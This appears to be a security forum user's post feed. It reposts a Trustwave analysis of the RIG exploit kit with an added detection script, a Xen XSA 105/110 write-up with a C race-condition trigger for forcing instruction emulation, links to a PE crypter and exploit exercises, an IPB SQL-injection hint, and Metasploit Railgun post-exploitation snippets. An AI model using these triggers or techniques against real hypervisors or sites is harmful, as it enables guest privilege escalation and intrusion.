Everything posted by Nytro
-
Supposedly it isn't completely fixed.
-
RIG Exploit Kit – Diving Deeper into the Infrastructure
February 23, 2015
Posted By SpiderLabs Research

Following our previous blog post about the leaking of the RIG exploit kit's source code, we dug deeper into the architecture that facilitates the massive infections using RIG. The screen shot below diagrams RIG's infrastructure.

Figure: RIG Exploit Kit Infrastructure

Most commonly we see only one end of this rabbit hole: the compromised site and the proxy server. Below we will detail what happens behind the scenes during the infection and explain how RIG customers use it to deploy their infection campaigns. We weren't kidding about digging deep, so grab a cup of coffee because you may be here a while.

First things first

RIG's infrastructure might look complicated, but it's rather straightforward for the customer who simply wants to infect victims and generate revenue. So, we'll start with the basics. For the purposes of our analysis, we'll take the perspective of a RIG customer that already maintains a backdoor on a popular web site and now wants to monetize that traffic. First, the RIG customer needs a URL to which they can redirect the traffic to exploit victims' machines.

RIG customer API - "api.php"

Figure: RIG Customer API ("Get Link" button - generates customer's specific URL)

In order to infect victims, the RIG customer has to choose a payload and upload it through the admin panel – but we won't focus on this. Once the RIG customer uploads the payload, it makes sense that the next step would be pointing victims to the infection page. However, in order to evade detection by web filters and URL lists, the landing page needs to update regularly. RIG provides an API for this purpose that creates new, valid infection URLs on demand. Clicking on the "Get Link" button in the interface pictured above will provide the API URL.
The URL will be in the following format:

    hxxp://[RIG-Instance-Server]/api.php?apitoken=[API TOKEN]

The "API TOKEN" at the end of the URL is a unique key that combines the user's ID with the current "Flow ID" (pictured in Figure 2 below), serializes the combination and encrypts it using RC4 with a private key configurable only by the main RIG administrator. Each RIG user can have up to 2 distinct flows, which allows for infections via different payloads for each flow.

Figure: Code snippet that appends the API token

The PROXY Layer

The output of the URL above is the "PROXY" URL, which functions as the "infection page". Here is an example of the structure of the "PROXY" URL:

    hxxp://[PROXY Server]/proxy.php?PHPSSESID=njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw-4|OTMxOGYwMjdkZTMxOGFmN2M5OWZkMDNjODE0MmMyODM

Every request to a PROXY URL (e.g., "index.php?PHPSSESID=…", "proxy.php?PHPSSESID=…", or more commonly just "hxxp://current-proxy-domain/?PHPSESSID=…") contains the token of a RIG customer for the specific campaign. Basically, all customers using the same RIG exploit kit server share the PROXY URL.

Before we discuss the PROXY core, let's take a closer look at the URI generated by "api.php". The URI is divided into 2 parts separated by the character "|". Here's the first part from our example:

    njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw-4

This encrypted string is actually a URL for a different server that handles requests to load an exploit and send it back to the victim's machine. Let's take a look at how this URL is generated:

Figure: Encrypted VDS URL code

To decrypt this content we need to use RC4 with the key and then use the function "base64url_decode". Here is the result of the string above, which is the VDS server that we will examine later on:

    http://vdstomama[.]com/core.php

The second part of the URL structure is less exciting.
The objective is to make sure the URL becomes invalid after a certain period of time, which is configurable by the RIG exploit kit admin; the default is 720 seconds (12 minutes). This technique is very effective because after 12 minutes the URL doesn't serve the exploits and is useless to security researchers trying to analyze such URLs.

Figure: Token generation code

The screenshot above describes the generation process of the token, which is a combination of the time, the user ID and the user login name, hashed together with MD5 and then encoded with base64url_encode.

Now, let's get back to the place where the PROXY URLs are managed:

Figure: Proxy list management

Only the RIG exploit kit administrator can manage this list. RIG customers have no control over it. The admin can bulk-load domains or load them one by one. This list functions as a queue, using the first item (topmost) until anti-virus tools begin detecting it or it is no longer online. On every RIG admin server, a scheduled task runs every 5 minutes to check the first active PROXY on the list:

Figure: PHP code to check the domains to be used as proxy servers

The domain is scanned by the "avdetect.com" service, and it is removed from the active list once it is detected as malicious. Additionally, if anti-virus vendors start to blacklist the PROXY server, then the RIG admin code will send the PROXY server a command to switch its assigned domain.

Figure: Proxy domains blacklisting code

The RIG administration server accesses the PROXY with a unique key along with the domain that should be removed. The domain is inserted into a blacklist file that is checked each time a victim is browsing the PROXY server.

The VDS Layer – Providing the landing page and exploits

VDS stands for Virtual Dedicated Server. The VDS serves the role of an exploit generator. The main objective is to avoid detection by keeping those servers hidden from the world. According to records we've collected since August 2014, the RIG developers only used three different VDS servers.
First stage – fetching the landing page

The first time the VDS is accessed, the result is the landing page content. The HTML/JS code itself is obfuscated using a function called CryptJS written by RIG's developers.

Figure: PHP function obfuscates the malicious JS code

After obfuscating the code, RIG's developers take extra caution by encrypting all of the data sent to the PROXY to avoid detection by an IPS or anything else monitoring the traffic.

Figure: PHP code serving the landing page (+ notify the admin server)

After sending the content back to the PROXY as depicted in the screenshot above, the VDS reports back to the RIG admin server about the exploit attempt.

Second stage – fetching the exploits

The landing page will check if the browser supports Java, Flash or Silverlight. According to the results of the plug-in enumeration code, the victim's browser will request the respective exploits. The PROXY receives the request from the victim machine and delivers it to the VDS. In order to request the appropriate exploit, the victim's browser will issue another request with a new parameter named "req". For example, if the value is "swf", the VDS server will send back the Flash exploit:

    hxxp://[redacted].ga/proxy.php?req=swf&num=8454&PHPSSESID=njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw-4|OTMxOGYwMjdkZTMxOGFmN2M5OWZkMDNjODE0MmMyODM

However, unlike the plug-in exploits, which are only served if applicable, the Internet Explorer exploit is served without any prerequisites, already in the first VDS response along with the initial landing page.

Third stage – fetching the payload

After it's exploited, the victim machine requests the payload using the parameter "req" with the value "mp3".

Figure: Payload serving code

The VDS sends a request to the RIG admin server along with information about the victim machine and asks for the relevant payload that should be delivered.
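As an added example (not code from the Trustwave post or from RIG itself), here is a Python classifier a defender could run over web-proxy logs to flag requests that match the PROXY URL shape described above. It splits the session token at "|", checks that the second half base64url-decodes to a 32-character hex MD5 digest (which is what the token generator described above produces), reports the length of the first half (RC4 is a stream cipher, so the ciphertext is exactly as long as the VDS URL it hides, and no key is needed for that observation), and maps the "req" parameter to the stage: landing page, Flash exploit or payload. The two token halves are the ones quoted in the post; the host names and log lines are constructed.

```python
"""Added example: flag RIG-shaped PROXY URLs in proxy logs (offline, no key)."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Both spellings appear in the article: "PHPSSESID" in proxy.php URLs and
# "PHPSESSID" on the bare proxy domain.
SESSION_PARAMS = ("PHPSSESID", "PHPSESSID")

# Meaning of "req" per the article: swf = Flash exploit, mp3 = encrypted
# payload; no "req" at all is the initial landing-page fetch.
REQ_STAGES = {"swf": "flash-exploit", "mp3": "payload"}

MD5_HEX = re.compile(rb"[0-9a-f]{32}")


def b64url_decode(text):
    """base64url without padding, as RIG's base64url_encode emits it."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def parse_rig_token(value):
    """Return decoded facts about an '<enc VDS url>|<expiry>' token, or None.

    The first half is RC4 ciphertext (key unknown), so only its length is
    reported. The second half must decode to a 32-char hex MD5 digest.
    """
    if value.count("|") != 1:
        return None
    enc_url, expiry = value.split("|")
    try:
        raw_url = b64url_decode(enc_url)
        raw_expiry = b64url_decode(expiry)
    except ValueError:
        return None
    if not MD5_HEX.fullmatch(raw_expiry):
        return None
    return {"vds_ciphertext_len": len(raw_url),
            "expiry_digest": raw_expiry.decode("ascii")}


def classify_request(url):
    """Tag one URL as a RIG PROXY request (with its stage) or as clean."""
    query = parse_qs(urlsplit(url).query)
    for name in SESSION_PARAMS:
        if name not in query:
            continue
        token = parse_rig_token(query[name][0])
        if token is None:
            continue
        req = query.get("req", [None])[0]
        stage = "landing" if req is None else REQ_STAGES.get(req, "req=" + req)
        return {"rig": True, "stage": stage, **token}
    return {"rig": False}


def scan_log(lines):
    """Run classify_request over 'timestamp client method url' log lines."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        verdict = classify_request(fields[3])
        if verdict["rig"]:
            hits.append((fields[1], verdict["stage"], verdict["expiry_digest"]))
    return hits


# Constructed log lines; the token halves are the ones quoted in the article,
# the host names are placeholders.
TOKEN = ("njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw-4"
         "|OTMxOGYwMjdkZTMxOGFmN2M5OWZkMDNjODE0MmMyODM")
SAMPLE_LOG = [
    "2015-02-23T10:01:02Z 10.0.0.5 GET http://proxy.example/?PHPSESSID=" + TOKEN,
    "2015-02-23T10:01:04Z 10.0.0.5 GET "
    "http://proxy.example/proxy.php?req=swf&num=8454&PHPSSESID=" + TOKEN,
    "2015-02-23T10:02:10Z 10.0.0.7 GET "
    "http://shop.example/index.php?PHPSESSID=3f2a9c0d1e7b4a5c",
    "2015-02-23T10:02:11Z 10.0.0.7 GET http://app.example/?PHPSESSID=abc|def",
]

if __name__ == "__main__":
    for client, stage, digest in scan_log(SAMPLE_LOG):
        print(f"{client} RIG {stage} expiry-token md5={digest}")
```

On the constructed log the two proxy.example requests are flagged (landing page, then the Flash exploit fetch) and the two ordinary PHPSESSID URLs are not. The digest alone does not reveal the time, user ID or login that went into the MD5, so this is a shape test on the token, not a decryption of it.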
The payload is pulled from the RIG admin server and encrypted using an RC4 key (a different key from the previous one) to avoid anti-virus detection.

Figure: Encrypted payload

Since this key is less important, it is sent to the victim machine during the exploitation phase. The executable itself is decrypted on the victim machine, written to the file system and then executed. For example, if the successful exploit is CVE-2014-6332 then the decryption phase looks like this:

Figure: Payload decryption (part of the exploits)

RIG Administration Server

The RIG developers planned the infrastructure as a layered structure: the RIG admin server is basically nothing but a control panel and does not proactively exploit victim machines. Therefore, the RIG admin server can function for a long period of time behind a service such as CloudFlare, unlike the proxies, which are replaced regularly. The admin server provides RIG customers with full control of their malware campaign and does not require any specialized knowledge of the back end. The RIG customer only needs to (1) figure out how to spread the infection URLs (typically by compromising web sites with large volumes of traffic, or malvertising) and (2) ensure the payload is stable.

Figure: Payload management panel

Just like its competition, the RIG exploit kit provides complete statistics of the campaign's achievements.

Figure: Flow statistics

The screenshot above displays the main statistics page of the exploit kit. The overall exploitation rate for this specific "flow" is 14.7%. You can notice that the overall exploitation is divided between Flash and Internet Explorer exploits. Specific CVEs include: CVE-0214-0311 in Flash; CVE-2013-2551 in versions 7, 8, and 9 of MSIE; and CVE-2014-6332 in Internet Explorer 10. Additional information reported includes countries targeted, browser versions and OS.
The business model

Here you'll see an advertisement for the RIG exploit kit on a Russian forum:

Figure: RIG advertisement

This advertisement is aimed at customers that want to distribute their malware (payload) using the RIG exploit kit. The criminals behind RIG also established a reselling model, whereby each reseller can have their own RIG admin panel from which their own customers will deploy infection campaigns. Thus far our research has shown at least two large resellers accounting for over 250 customers combined. We can only assume there are additional resellers. Nonetheless, in comparison to the main RIG admin panel, which provided services to about 360 customers, it becomes evident that the reselling model almost doubled their profit. The data we examined accounts for the period of time between August 2014 and February 2015.

Figure: RIG reselling model

Multiplying 600 customers by $150 (the price per week of use), we estimate that the RIG exploit kit could be generating up to $90,000 per week. This rough estimate doesn't take into account operational expenses or customers that pay with a portion of their infections (similar to the Magnitude exploit kit's model), but it still shows that exploit kits can result in a very nice profit for the developers.

Trustwave customers using Trustwave SWG or Trustwave UTM are protected against RIG Exploit Kit without the need for any further updates.

Source: https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/
-
The Dangers of x86 Emulation: Xen XSA 110 and 105
Posted by Felix Wilhelm

Developing a secure and feature-rich hypervisor is no easy task. Recently, the open source Xen hypervisor was affected by two interesting vulnerabilities involving its x86 emulation code: XSA 110 and XSA 105. Both bugs show that the attack surface of hypervisors is often larger than expected.

XSA 105 was originally reported by Andrei Lutas from BitDefender. The patch adds missing privilege checks to the emulation routines of several critical system instructions, including LGDT and LIDT. The vulnerable code can be reached from unprivileged user code running inside hardware virtual machine (HVM) guests and can be used to escalate guest privileges. XSA 110 was reported by Jan Beulich from SUSE and concerns insufficient checks when emulating long jumps, calls or returns.

Readers interested in virtualization technology might wonder about the existence of an instruction emulator in the HVM hypervisor code: one of the advantages of hardware-assisted virtualization is the ability to execute privileged instructions natively and securely. While this is true in general, emulation is still needed for some special cases:

- Instructions accessing memory-mapped IO space.
- VMs running in real mode: due to restrictions of earlier Intel VMX versions, many popular hypervisors emulate VM code running in real mode.
- Support for instructions not yet implemented by the physical hardware.

In practice, all mainstream hypervisors include at least basic emulation support, of widely varying quality. While memory flaws in the emulator code could allow for a complete hypervisor breakout, logic bugs involving wrongly emulated instructions are much more common. In the worst case, these bugs can result in privilege escalation vulnerabilities inside the guest VM, as is the case for XSA 105. As mentioned in the advisory, the bug is caused by missing privilege checks for certain special instructions.
In order to exploit this bug for privilege escalation, we require a way to emulate arbitrary instructions as a normal user inside a VM.

Emulating Arbitrary Instructions

Fortunately, emulation of arbitrary instructions can be triggered easily on guests with multiple virtual CPUs, as described by Andrei Lutas in his writeup: first, we raise a #UD exception on one of the CPUs by executing an invalid opcode. This will trigger a VM exit, which is handled by the main VM exit handler. For Intel CPUs, this handler is the vmx_vmexit_handler function defined in x86/hvm/vmx/vmx.c:

```c
void vmx_vmexit_handler(struct cpu_user_regs *regs)
{
    …
    switch ( exit_reason )
    {
    …
    case TRAP_invalid_op:
        HVMTRACE_1D(TRAP, vector);
        vmx_vmexit_ud_intercept(regs);
        break;
    …
    }
```

While the complete exit handler is quite complex, at its core it is just a big switch statement based on the VMX exit reason. In the case of a #UD exception, the vmx_vmexit_ud_intercept function is called:

```c
static void vmx_vmexit_ud_intercept(struct cpu_user_regs *regs)
{
    struct hvm_emulate_ctxt ctxt;
    int rc;

    hvm_emulate_prepare(&ctxt, regs);
    rc = hvm_emulate_one(&ctxt);
    ...
}
```

As we can see, the function is a small wrapper around hvm_emulate_one, which in turn calls into the x86_emulate function defined in x86/x86_emulate/x86_emulate.c for the actual emulation. One interesting aspect for us is that x86_emulate fetches the actual bytes to be emulated directly from guest memory. This means that there exists a race condition from the time when the #UD exception is raised to the point when x86_emulate fetches the instruction bytes. If we use our second virtual CPU to manipulate the originally invalid opcode during this time span, we can force emulation of arbitrary assembly instructions. While winning this race reliably is quite hard, even a small chance to win is sufficient for our use case.
The code snippet below shows a minimal sample that will trigger emulation of a far return using this technique:

```c
#include <stdlib.h>
#include <pthread.h>
#include <time.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

// Build without PIE (e.g. gcc -no-pie -pthread) so that the absolute
// [trigger] and [barrier] operands in the inline assembly can be encoded.

// Initialize barrier with 0
long barrier = 0;

void *thread_one(void *x)
{
    __asm volatile(".intel_syntax noprefix\n"
                   ".code64\n"
                   // Write UD2 instruction at position of ret
                   "mov byte ptr [trigger], 0x0F\n"
                   "mov byte ptr [trigger+1], 0x0B\n"
                   // Increase barrier
                   "lea rax, [barrier]\n"
                   "lock inc qword ptr [rax]\n"
                   "wait:\n"
                   "cmp qword ptr [rax], 2\n"
                   // Wait until thread_two arrives at barrier
                   "jnz wait\n"
                   "trigger:\n"
                   // Will be replaced with UD2 by now
                   "rex64 retf\n"
                   ".att_syntax prefix\n");
    return NULL;
}

void *thread_two(void *x)
{
    __asm volatile(".intel_syntax noprefix\n"
                   ".code64\n"
                   "lea rax, [barrier]\n"
                   "lock inc qword ptr [rax]\n"
                   "wait2:\n"
                   "cmp qword ptr [rax], 2\n"
                   "jnz wait2\n"
                   // Restore far ret instruction
                   "mov byte ptr [trigger], 0x48\n"
                   "mov byte ptr [trigger+1], 0xCB\n"
                   ".att_syntax prefix\n");
    return NULL;
}

void doStuff(void)
{
    // Initialize and start both threads.
    pthread_t h1, h2;
    pthread_create(&h1, NULL, thread_one, NULL);
    pthread_create(&h2, NULL, thread_two, NULL);
    pthread_join(h1, 0);
    pthread_join(h2, 0);
}

int main(int argc, char **argv)
{
    // We have to make the code of thread_one writable in order to enable
    // patching of the instruction. Simply mprotecting the whole page is the
    // easiest way to do this.
    long page_size = sysconf(_SC_PAGESIZE);
    long address = (long) thread_one;
    mprotect(((void *) (address & ~(page_size - 1))), page_size,
             PROT_READ | PROT_WRITE | PROT_EXEC);
    doStuff();
    return 0;
}
```

Of course, without bugs in the emulator code this ability is not very interesting in itself. Besides classic low-level code issues like memory corruptions, there are two features of an emulator that can be an interesting source of security vulnerabilities:

- Guest Memory Access: most emulated instructions will access VM memory either directly or indirectly. During normal operation, memory access checks are performed automatically by the hardware. However, when emulating, all these checks have to be performed by the hypervisor itself. The low-level nature of this code, as well as the high complexity of the x86 architecture, makes this work quite error prone.
- Privileged Instructions: several x86 instructions should only be called from ring 0. This includes instructions that manipulate control or system registers, instructions that influence segment selectors, or even simple ones like “HLT”, which halts the CPU.

Xen XSA 105

Xen XSA 105 is a quite simple example of the second bug type. When looking at the implementation of the wrmsr instruction inside the Xen emulator, we can see that the instruction will only be evaluated when the caller is in ring 0:

```c
case 0x30: /* wrmsr */ {
    uint64_t val = ((uint64_t)_regs.edx << 32) | (uint32_t)_regs.eax;
    generate_exception_if(!mode_ring0(), EXC_GP, 0);   /* the ring 0 check */
    fail_if(ops->write_msr == NULL);
    if ( (rc = ops->write_msr((uint32_t)_regs.ecx, val, ctxt)) != 0 )
        goto done;
    break;
}
```

However, this check is missing for several other instructions, including HLT, LIDT and LGDT:

```c
case 0xf4: /* hlt */
    ctxt->retire.flags.hlt = 1;
    break;
…
case 2: /* lgdt */
case 3: /* lidt */
    generate_exception_if(ea.type != OP_MEM, EXC_UD, -1);
    fail_if(ops->write_segment == NULL);
    memset(&reg, 0, sizeof(reg));
    if ( (rc = read_ulong(ea.mem.seg, ea.mem.off+0,
                          &limit, 2, ctxt, ops)) ||
         (rc = read_ulong(ea.mem.seg, ea.mem.off+2,
                          &base, mode_64bit() ? 8 : 4, ctxt, ops)) )
        goto done;
    reg.base = base;
    reg.limit = limit;
    if ( op_bytes == 2 )
        reg.base &= 0xffffff;
    if ( (rc = ops->write_segment((modrm_reg & 1) ?
                                  x86_seg_idtr : x86_seg_gdtr,
                                  &reg, ctxt)) )
        goto done;
    break;
```

Because LIDT allows overwriting the Interrupt Descriptor Table, which stores the handlers of all hardware and software interrupts, privilege escalation is easily possible. The already mentioned whitepaper describes the exploitation process on Windows in detail.
The patch for XSA 105 is as simple as the bug: just add ring 0 checks in front of all privileged instructions.

Xen XSA 110

The second recent bug involving the Xen emulator is Xen XSA 110, which was discovered by Jan Beulich from SUSE. x86 supports far branch instructions that jump to a new address while simultaneously changing the code segment selector to a new value. In order to understand the underlying details of this vulnerability, a bit of background about the role of segment selectors on modern operating systems is needed: when we are talking about ring 0 or ring 3 mode, we are actually talking about the “Current Privilege Level” (CPL) of the currently executing code. The CPL is encoded in the lowest bits of the CS segment selector and cannot be changed by normal means. Direct access to the CS register is impossible, and instructions that change the value of the CS register take care to ensure that a switch to ring 0 is only possible under special predefined circumstances. Besides being used for enabling and disabling access to privileged instructions, the CPL is used whenever memory is accessed. The “Descriptor Privilege Level” (DPL) of a memory segment, which is encoded in the segment descriptor, restricts access to code that executes with a CPL smaller than or equal to the DPL.

The issue patched with XSA 110 is the fact that the actual checks performed by the Xen emulator when changing the value of the CS register are much weaker than they should be. The following code is part of the vulnerable function protmode_load_seg defined in x86/x86_emulate/x86_emulate.c:

```c
dpl = (desc.b >> 13) & 3;
rpl = sel & 3;
cpl = ss.attr.fields.dpl;
switch ( seg )
{
case x86_seg_cs:
    /* Code segment? */
    if ( !(desc.b & (1u<<11)) )
        goto raise_exn;
    /* Non-conforming segment: check DPL against RPL. */
    if ( ((desc.b & (6u<<9)) != (6u<<9)) && (dpl != rpl) )
        goto raise_exn;
    break;
```

protmode_load_seg is indirectly called by the emulation routines of all far branching instructions (RETF, CALL and JMP). Its purpose is to change the value of a segment selector register after validating the new value. However, in the unpatched version no sufficient checking is performed. An attacker wanting to escalate privileges on a Linux system would choose the CS register value 0x10, which corresponds to the CS value used by the Linux kernel. In this case the variables rpl and dpl in Listing 6 would be 0, while the current CPL would still be 3. But because the switch for the code segment does not check the current CPL in any way, the instruction would be emulated.

While we originally thought this bug would be sufficient for privilege escalation, this does not seem to be the case due to an interesting and lesser-known property of the Intel x86 architecture. While the current CPL is always stored in the lowest bits of the CS selector, there is a hard requirement that the same value is also stored in the DPL field of the stack segment. Because this requirement is not actually handled by the emulator code, an exploit targeting this vulnerability will result in a crash of the virtual machine. A normal user should not be able to trigger this behavior, but it is a significantly less interesting bug.

Summary

Xen XSA 105 and XSA 110 are two bugs involving the Xen x86 emulation code. They both can be used to crash a virtual machine as an unprivileged user, and XSA 105 even allows privilege escalation independent of vulnerabilities in the virtualized operating system. Bugs like this show that hypervisors are often not as hardened as many people assume, and the introduction of additional software layers will lead to additional bugs. Full exploit code for Xen XSA 105 will be presented during the Exploiting Hypervisors Workshop at Troopers 15 and will be released publicly sometime after that.
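To make the checking gap concrete, the following Python model (added here; it is neither Xen's code nor the text of the XSA 110 patch) reproduces the CS branch of protmode_load_seg from the listing above as vulnerable_load_cs and sets beside it a hardened_load_cs that applies the Intel SDM privilege rules for far JMP/CALL and far RET. The descriptor words are constructed to mirror a typical 64-bit Linux GDT (kernel code at selector 0x10, user code at 0x33) and are not taken from any real dump; stack_consistent models the SS.DPL == CPL requirement that the article says turns the attempt into a VM crash.

```python
"""Added model of the CS selector checks in protmode_load_seg (not Xen code).

desc_b follows the descriptor layout the Xen listing uses: bit 11 = code
segment, bit 10 = conforming, bits 13-14 = DPL.
"""

CODE_BIT = 1 << 11
CODE_CONFORMING = 6 << 9          # the (6u<<9) mask from the Xen listing

# Constructed descriptor high dwords, modelled on a 64-bit Linux GDT.
KERNEL_CS_DESC_B = 0x00AF9B00     # present, DPL 0, non-conforming code
USER_CS_DESC_B = 0x00AFFB00       # present, DPL 3, non-conforming code
DATA_DESC_B = 0x00CF9300          # present, DPL 0, writable data


class SegmentFault(Exception):
    """Stands in for the #GP the emulator raises through 'goto raise_exn'."""


def _fields(desc_b, sel):
    if not desc_b & CODE_BIT:
        raise SegmentFault("target is not a code segment")
    dpl = (desc_b >> 13) & 3
    rpl = sel & 3
    conforming = (desc_b & CODE_CONFORMING) == CODE_CONFORMING
    return dpl, rpl, conforming


def vulnerable_load_cs(desc_b, sel, cpl):
    """Unpatched logic: only DPL == RPL is tested; cpl is never consulted.
    Returns the CPL the guest would run with afterwards (CS.RPL)."""
    dpl, rpl, conforming = _fields(desc_b, sel)
    if not conforming and dpl != rpl:
        raise SegmentFault("non-conforming segment: DPL != RPL")
    return rpl


def hardened_load_cs(desc_b, sel, cpl, is_ret):
    """Privilege rules from the Intel SDM for far JMP/CALL and far RET.
    An illustration of the missing checks, not the XSA 110 patch text."""
    dpl, rpl, conforming = _fields(desc_b, sel)
    if is_ret:
        # A far return may only land at the same or a less privileged level.
        if rpl < cpl:
            raise SegmentFault("RET to a more privileged CPL")
        if conforming and dpl > rpl:
            raise SegmentFault("conforming segment: DPL > RPL")
        if not conforming and dpl != rpl:
            raise SegmentFault("non-conforming segment: DPL != RPL")
        return rpl
    # A far JMP/CALL straight to a code segment never changes the CPL.
    if conforming and dpl > cpl:
        raise SegmentFault("conforming segment: DPL > CPL")
    if not conforming and (rpl > cpl or dpl != cpl):
        raise SegmentFault("non-conforming segment: RPL > CPL or DPL != CPL")
    return cpl


def stack_consistent(new_cpl, ss_dpl):
    """The invariant the article points to: SS.DPL must equal the CPL.
    Xen reads cpl from ss.attr.fields.dpl, so after a CS-only change the
    two disagree and the guest dies instead of running at ring 0."""
    return new_cpl == ss_dpl


def allowed(loader, *args, **kwargs):
    """True if the loader accepts the transfer, False if it raises #GP."""
    try:
        loader(*args, **kwargs)
        return True
    except SegmentFault:
        return False


def escalation_attempt():
    """Ring-3 far return to selector 0x10 (the Linux kernel CS), as in the
    article: the unpatched check lets it through, the hardened one does not."""
    new_cpl = vulnerable_load_cs(KERNEL_CS_DESC_B, 0x10, cpl=3)
    return {
        "vulnerable_new_cpl": new_cpl,
        "ss_dpl_matches": stack_consistent(new_cpl, ss_dpl=3),
        "hardened_allows": allowed(hardened_load_cs, KERNEL_CS_DESC_B, 0x10,
                                   cpl=3, is_ret=True),
    }


if __name__ == "__main__":
    print(escalation_attempt())
```

The unpatched check compares dpl against rpl and never reads cpl, so a ring-3 far return to selector 0x10 passes (both are 0) and leaves CS.RPL at 0 while SS.DPL is still 3. The hardened version rejects the same transfer because a RET may not lower the RPL below the current CPL, and a far JMP/CALL to a non-conforming segment must keep DPL == CPL.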
Source: http://www.insinuator.net/2015/02/the-dangers-of-x86-emulation-xen-xsa-110-and-105/
-
Yes, I also want an SSD made before 2006.
-
Shit just got serious.
-
OFFENSIVE SECURITY LECTURES - 12: EXPLOIT DEVELOPMENT 103

Description: Third lecture in the exploit development lecture series. Coverage of heap and format string exploitation (with demos), as well as exploit mitigations (ASLR, NX/DEP, stack cookies, EMET, etc.).

PDF: https://docs.google.com/presentation/d/1jG-doOVFTg2ayamQ7E5tlfSw3HLb6VOARUu48TTMpHo/edit?usp=sharing

Reading: Read 0x680 up to 0x6A0 in HAOE

Via: http://www.securitytube.net/video/12450
-
WinObjEx64
Windows Object Explorer 64-bit

WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on them or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 lets you view and edit object-related security information if you have the required access rights.

System Requirements

WinObjEx64 does not require administrative privileges. However, administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows versions: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP; Windows Vista is partially supported. We have no plans for full support of them. In order to use all program features, Windows must be booted in DEBUG mode.

Build

WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 or a later version.

Authors

© 2015 WinObjEx64 Project
Original WinObjEx © 2003 - 2005 Four-F

Source: https://github.com/hfiref0x/WinObjEx64
-
Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching
The 3.x branch of the Linux kernel has been dropped

After letting users decide the version numbering of the Linux kernel software, as Softpedia reported two weeks ago based on Linus Torvalds’ Google+ poll for Linux kernel 3.20/4.0, the time has come for a change, as Linus Torvalds was proud to announce today the immediate availability for testing of the first RC (Release Candidate) version of the forthcoming Linux 4.0 kernel.

This RC1 version is the first development release of what will become Linux kernel 4.0 in approximately 3-4 months. The final version of Linux kernel 4.0 will most probably arrive by summer 2015, when every kernel maintainer goes on vacation. However, Linus Torvalds tries to assure people that a version number change won’t bring any major features or break compatibility with previous releases.

“Because the people have spoken, and while most of it was complete gibberish, numbers don't lie. People preferred 4.0, and 4.0 it shall be. Unless somebody can come up with a good argument against it. On the other hand, the strongest argument for some people advocating 4.0 seems to have been a wish to see 4.1.15 - because ‘that was the version of Linux skynet used for the T-800 terminator,’” says Linus Torvalds in the mailing list announcement.

Live patching will be implemented in the final release of Linux kernel 4.0

Without further ado, you can download the Linux kernel 4.0 RC1 right now via Softpedia or directly from the kernel.org website, whichever suits you best. We remind you that it’s an unstable version that should not be installed on production machines. According to Linus Torvalds’ notes, it is a fairly small release, but not much smaller than the usual RC versions. Prominent features include various vm cleanups, and the unification of the PROTNONE and NUMA handling for page tables.

The final release of Linux kernel 4.0 will also include the highly anticipated live patching infrastructure.

By Marius Nestor

Source: Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching - Softpedia
-
Senior PHP & MySQL Developer

Knowledge and Skills
• Medium/Advanced knowledge of PHP & MySQL;
• Medium/Advanced knowledge of XHTML, CSS, JS, XML, CSS & HTML, AJAX;
• Medium/Advanced knowledge of OOP programming;
• Capacity to understand and adapt quickly to the working model of some complex and mature applications;
• Experience in developing web applications;
• Ability to create a flexible design and capacity to write well-structured code;
• Talented and fast learner;
• Reliable, loyal, motivated and ambitious, ready for long term collaboration;

Responsibilities
• You will develop and expand our product platform, along with your colleagues;
• You will work on long-term running projects for our clients;

The following represent an advantage
• University education in Computer Science, Informatics, Engineering, Cybernetics;
• Experience with the SVN versioning system;
• Knowledge of the required methods of working with Smarty;
• Be thorough, have good attention to detail and display a high level of accuracy;
• Strong analytical, creative thinking;

Job benefits
• Open minded team of highly skilled colleagues
• Modern environment, office building, downtown location
• Attractive financial and benefits package
• Relaxation at the dcs plus lounge together with colleagues and friends – bar, cinema, chill out area, billiards, ping-pong, darts, food court
• Other benefits: fruits and coffee on the house, medical insurance, teambuildings

Details from @Cheater
-
Invision Power Board 3.4.7 SQL Injection Vulnerability- IPB 3.4.7
Nytro replied to Molo.Interlopul's topic in Exploituri
(Still) I don't know Python, but go from your browser to: "site . com /interface/ipsconnect/ipsconnect.php ?" and see what response you get.
-
Hyperion-1.2.zip

Description: Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and is based on the paper "Hyperion: Implementation of a PE-Crypter".
MD5: dc31d022b124dc92e7c362a62e64bd46
Author: belial

Source: nullsecurity
-
exrs

Exercises for learning Reverse Engineering and Exploitation. All binaries for these challenges are ELF 64-bit LSB executable, x86-64.

reverse engineering

The goal is to run the challenges like this:

    ./rX password

and have them print out "password OK". It's reverse engineering, not cracking, so don't patch the binaries if you want to play by the rules. It gets really boring if you don't anyway.

sploit

All the sploit exercises are designed to be solvable with NX+ASLR without being dependent on which libc is used. The idea is that you should only interact with stdin/stdout as if it were a remote service; argv & env are not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun!

Link: https://github.com/wapiflapi/exrs
-
Accessing the Windows API Directly
February 19, 2015

If you are into pentesting I am sure you have heard about the IRB shell in the Metasploit framework. This will be a small post about accessing the Windows API using Railgun. Using Railgun we can access different functions in DLLs during runtime, in memory. We could also write our own DLLs and call them directly using Railgun. This technique is used in the Meterpreter scripts and post exploitation modules to access the API to perform automated tasks. For demonstration I will be using a Windows 7 machine as the target and Kali as the attacker machine. After owning the box, type “irb” in the meterpreter session and from there we can start the interactive Ruby shell. The “client” will be our meterpreter client. We can access common API calls like this. Suppose I want to get the system information:

```ruby
client.sys.config.sysinfo
```

Get the user ID:

```ruby
client.sys.config.getuid
```

